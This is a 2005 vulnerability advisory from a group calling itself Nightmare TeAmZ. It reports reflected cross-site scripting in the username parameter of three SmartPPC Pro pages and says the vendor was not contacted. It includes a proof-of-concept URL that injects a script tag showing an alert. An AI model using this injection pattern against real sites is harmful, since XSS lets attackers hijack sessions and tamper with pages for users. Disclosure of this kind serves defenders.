SmartPPCProXSS.txt

2005-11-30T00:00:00
ID PACKETSTORM:41934
Type packetstorm
Reporter BiPi_HaCk
Modified 2005-11-30T00:00:00

Description

                                        
                                            `------------------------------------------------------  
Nightmare TeAmZ Advisory 017  
------------------------------------------------------  
Date - 11/2005  
SmartPPC Pro Xss  
  
  
AFFECTED PRODUCTS  
=================  
SmartPPC Pro  
http://www.orbitscripts.com  
  
  
Overview:  
========  
SmartPPC Standard is a full-featured Pay Per Click Search Engine with   
extended functionality. This script is easy enough for a novice to maintain   
but has the features and power suitable for PPC pros. SmartPPC is the   
solution for customers tired of the limitations of other PPC scripts, and   
customers tired of chasing down the bugs in their custom developed PPC   
search engines. This version has been sold for two years, and our customers   
have earned several million dollars using it. All known bugs were fixed   
during these two years. SmartPPC Standard runs from a different core than   
our popular SmartPPC Lite script. We'd like to emphasize the following   
important features:  
  
  
Xss Vulnerable Path:  
========  
/directory.php?username=[XSS]  
/frames.php?username=[XSS]  
/search.php?username=[XSS]  
  
Poof:  
========  
http://www.[Host].com/[Path]/search.php?keywords=1&username=--><script>alert('Hacked   
By Nightmare TeAmZ');</script>&alt_search=1&submitLuck=I%27m%20Was%20Hacked  
  
Solution:  
========  
1. Venditor Not Contacted  
  
  
Credits  
=======  
This vulnerability was discovered and researched by  
BiPi_HaCk of Nightmare TeAmZ  
We're: BiPi_HaCk - r3d_4Ss4ult3r - Sub_Z3r0  
Site: http://www.NightmareSecurity.net <--IT Security Forum  
  
_________________________________________________________________  
Personalizza MSN Messenger con sfondi e fotografie!   
http://www.ilovemessenger.msn.it/  
`